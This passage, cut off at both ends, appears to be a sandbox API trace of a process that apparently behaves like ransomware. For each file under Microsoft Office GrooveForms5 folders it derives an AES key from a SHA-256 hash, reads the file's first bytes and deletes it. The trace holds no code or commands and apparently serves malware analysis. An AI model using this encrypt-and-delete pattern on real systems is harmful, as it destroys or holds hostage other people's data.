szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0160.266] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0160.266] CryptHashData (hHash=0x284d5a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0160.266] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0160.266] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x21a6 [0160.266] ReadFile (in: hFile=0x4c8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0160.293] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0160.294] CryptDestroyKey (hKey=0x284d668) returned 1 [0160.294] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0160.295] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\bg_LightSpirit.gif" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\bg_lightspirit.gif")) returned 1 [0160.296] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0160.297] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0160.297] CryptHashData (hHash=0x284d628, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0160.297] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0160.297] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3d57 [0160.297] ReadFile (in: hFile=0x4a8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0160.306] CryptDestroyHash (hHash=0x284d628) returned 1 [0160.306] CryptDestroyKey (hKey=0x284d668) returned 1 [0160.306] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0160.308] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\bg_OliveGreen.gif" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\bg_olivegreen.gif")) returned 1 [0160.310] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0160.310] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0160.310] CryptHashData (hHash=0x284d5a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0160.310] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0160.310] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1845 [0160.311] ReadFile (in: hFile=0x4c8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0160.313] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0160.313] CryptDestroyKey (hKey=0x284d668) returned 1 [0160.313] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0160.315] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\bg_Premium.gif" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\bg_premium.gif")) returned 1 [0160.316] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0160.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bg_SlateBlue.gif", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bg_SlateBlue.gif", lpUsedDefaultChar=0x0) returned 17 [0160.317] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0160.317] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0160.317] CryptHashData (hHash=0x284d628, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0160.317] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0160.317] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5141 [0160.318] ReadFile (in: hFile=0x4a8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0160.321] CryptDestroyHash (hHash=0x284d628) returned 1 [0160.321] CryptDestroyKey (hKey=0x284d668) returned 1 [0160.321] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0160.322] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\bg_SlateBlue.gif" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\bg_slateblue.gif")) returned 1 [0160.323] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0160.323] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bg_TexturedBlue.gif", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bg_TexturedBlue.gif", lpUsedDefaultChar=0x0) returned 20 [0160.323] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0160.324] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0160.324] CryptHashData (hHash=0x284d5a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0160.324] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0160.324] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x193c [0160.324] ReadFile (in: hFile=0x4c8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0160.347] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0160.347] CryptDestroyKey (hKey=0x284d668) returned 1 [0160.347] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0160.348] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\bg_TexturedBlue.gif" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\bg_texturedblue.gif")) returned 1 [0160.349] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0160.349] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bg_VelvetRose.gif", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bg_VelvetRose.gif", lpUsedDefaultChar=0x0) returned 18 [0160.350] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0160.350] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0160.350] CryptHashData (hHash=0x284d628, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0160.350] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0160.350] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3c64 [0160.350] ReadFile (in: hFile=0x4a8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0160.354] CryptDestroyHash (hHash=0x284d628) returned 1 [0160.354] CryptDestroyKey (hKey=0x284d668) returned 1 [0160.354] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0160.355] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\bg_VelvetRose.gif" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\bg_velvetrose.gif")) returned 1 [0160.356] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0160.371] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0160.371] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0160.372] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0160.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Adobe.css", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Adobe.css", lpUsedDefaultChar=0x0) returned 10 [0160.372] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0160.373] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0160.373] CryptHashData (hHash=0x284d668, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0160.373] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d628) returned 1 [0160.373] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x75c [0160.373] ReadFile (in: hFile=0x4a8, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0160.382] CryptDestroyHash (hHash=0x284d668) returned 1 [0160.382] CryptDestroyKey (hKey=0x284d628) returned 1 [0160.382] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0160.383] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Adobe.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\adobe.css")) returned 1 [0160.384] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0160.385] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0160.385] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0160.385] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0160.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TAB_OFF.GIF", cchWideChar=-1, lpMultiByteStr=0x3269630, cbMultiByte=260, lpDefaultChar=0x3268e0f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TAB_OFF.GIF", lpUsedDefaultChar=0x0) returned 12 [0160.385] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0160.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TAB_ON.GIF", cchWideChar=-1, lpMultiByteStr=0x3269630, cbMultiByte=260, lpDefaultChar=0x3268e0f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TAB_ON.GIF", lpUsedDefaultChar=0x0) returned 11 [0160.385] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 0 [0160.385] FindClose (in: hFindFile=0x284d5e8 | out: hFindFile=0x284d5e8) returned 1 [0160.385] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0160.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Americana.css", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Americana.css", lpUsedDefaultChar=0x0) returned 14 [0160.386] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0160.386] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0160.386] CryptHashData (hHash=0x284d5e8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0160.386] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d628) returned 1 [0160.386] GetFileSize (in: hFile=0x4cc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb96 [0160.386] ReadFile (in: hFile=0x4cc, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0160.416] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0160.416] CryptDestroyKey (hKey=0x284d628) returned 1 [0160.416] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0160.417] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Americana.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\americana.css")) returned 1 [0160.418] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0160.419] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0160.419] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0160.419] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0160.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BUTTON.GIF", cchWideChar=-1, lpMultiByteStr=0x3269630, cbMultiByte=260, lpDefaultChar=0x3268e0f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BUTTON.GIF", lpUsedDefaultChar=0x0) returned 11 [0160.419] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0160.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HEADER.GIF", cchWideChar=-1, lpMultiByteStr=0x3269630, cbMultiByte=260, lpDefaultChar=0x3268e0f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HEADER.GIF", lpUsedDefaultChar=0x0) returned 11 [0160.419] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0160.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TAB_OFF.GIF", cchWideChar=-1, lpMultiByteStr=0x3269630, cbMultiByte=260, lpDefaultChar=0x3268e0f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TAB_OFF.GIF", lpUsedDefaultChar=0x0) returned 12 [0160.419] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0160.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TAB_ON.GIF", cchWideChar=-1, lpMultiByteStr=0x3269630, cbMultiByte=260, lpDefaultChar=0x3268e0f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TAB_ON.GIF", lpUsedDefaultChar=0x0) returned 11 [0160.419] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 0 [0160.419] FindClose (in: hFindFile=0x284d668 | out: hFindFile=0x284d668) returned 1 [0160.419] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0160.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BabyBlue.css", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BabyBlue.css", lpUsedDefaultChar=0x0) returned 13 [0160.420] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0160.420] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0160.420] CryptHashData (hHash=0x284d668, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0160.420] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d628) returned 1 [0160.420] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xcb0 [0160.420] ReadFile (in: hFile=0x4a8, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0160.440] CryptDestroyHash (hHash=0x284d668) returned 1 [0160.440] CryptDestroyKey (hKey=0x284d628) returned 1 [0160.440] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0160.441] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BabyBlue.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\babyblue.css")) returned 1 [0160.442] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0160.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Beige.css", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Beige.css", lpUsedDefaultChar=0x0) returned 10 [0160.443] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0160.443] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0160.443] CryptHashData (hHash=0x284d5e8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0160.443] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d628) returned 1 [0160.443] GetFileSize (in: hFile=0x4cc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x71f [0160.444] ReadFile (in: hFile=0x4cc, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0160.472] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0160.472] CryptDestroyKey (hKey=0x284d628) returned 1 [0160.472] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0160.473] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Beige.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\beige.css")) returned 1 [0160.474] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0160.475] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0160.475] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0160.475] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0160.475] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TAB_OFF.GIF", cchWideChar=-1, lpMultiByteStr=0x3269630, cbMultiByte=260, lpDefaultChar=0x3268e0f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TAB_OFF.GIF", lpUsedDefaultChar=0x0) returned 12 [0160.475] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0160.475] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TAB_ON.GIF", cchWideChar=-1, lpMultiByteStr=0x3269630, cbMultiByte=260, lpDefaultChar=0x3268e0f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TAB_ON.GIF", lpUsedDefaultChar=0x0) returned 11 [0160.475] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 0 [0160.475] FindClose (in: hFindFile=0x284d668 | out: hFindFile=0x284d668) returned 1 [0160.475] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0160.475] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Biscay.css", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Biscay.css", lpUsedDefaultChar=0x0) returned 11 [0160.476] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0160.476] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0160.476] CryptHashData (hHash=0x284d668, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0160.476] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d628) returned 1 [0160.476] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd80 [0160.476] ReadFile (in: hFile=0x4a8, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0160.497] CryptDestroyHash (hHash=0x284d668) returned 1 [0160.497] CryptDestroyKey (hKey=0x284d628) returned 1 [0160.497] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0160.498] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Biscay.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\biscay.css")) returned 1 [0160.499] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0160.500] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0160.500] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0160.500] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0160.500] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="background.gif", cchWideChar=-1, lpMultiByteStr=0x3269630, cbMultiByte=260, lpDefaultChar=0x3268e0f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="background.gif", lpUsedDefaultChar=0x0) returned 15 [0160.522] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52568) returned 1 [0160.523] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0160.523] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0160.523] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0160.523] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x143 [0160.523] ReadFile (in: hFile=0x4a8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0160.524] CryptDestroyHash (hHash=0x284d628) returned 1 [0160.524] CryptDestroyKey (hKey=0x284d668) returned 1 [0160.524] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0160.525] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BrightOrange\\background.gif" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\brightorange\\background.gif")) returned 1 [0160.526] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0160.526] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BUTTON.GIF", cchWideChar=-1, lpMultiByteStr=0x3269630, cbMultiByte=260, lpDefaultChar=0x3268e0f, 